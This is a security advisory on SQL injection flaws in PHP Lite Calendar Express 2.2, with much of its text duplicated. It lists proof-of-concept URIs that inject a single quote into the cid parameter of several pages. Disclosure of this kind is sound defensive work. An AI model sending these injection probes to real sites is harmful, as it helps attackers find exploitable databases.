Calendar Express Multiple SQL Injection Vulnerabilities
BID:14504
Info
Calendar Express Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 14504 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3627 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 08 2005 12:00AM |
| Updated: | May 12 2015 07:52PM |
| Credit: | aLMaSTeR HacKeR <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHP Lite Calendar Express 2.2 |
| Not Vulnerable: | |
Discussion
Calendar Express Multiple SQL Injection Vulnerabilities
Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
Calendar Express Multiple SQL Injection Vulnerabilities
No exploit is required.
The following proof-of-concept URIs are available:
http://www.example.com/calendarexpress/login.php?cid='
http://www.example.com/calendarexpress/month.php?cid='
http://www.example.com/calendarexpress/auth.php?cid='
http://www.example.com/calendarexpress/year.php?cid='
http://www.example.com/calendarexpress/week.php?cid='
http://www.example.com/calendarexpress/day.php?cid='
http://www.example.com/calendarexpress/subscribe.php?cid='
No exploit is required.
The following proof-of-concept URIs are available:
http://www.example.com/calendarexpress/login.php?cid='
http://www.example.com/calendarexpress/month.php?cid='
http://www.example.com/calendarexpress/auth.php?cid='
http://www.example.com/calendarexpress/year.php?cid='
http://www.example.com/calendarexpress/week.php?cid='
http://www.example.com/calendarexpress/day.php?cid='
http://www.example.com/calendarexpress/subscribe.php?cid='
Solution / Fix
Calendar Express Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Calendar Express Multiple SQL Injection Vulnerabilities
References:
References:
- Calendar Express Homepage (PHPLite)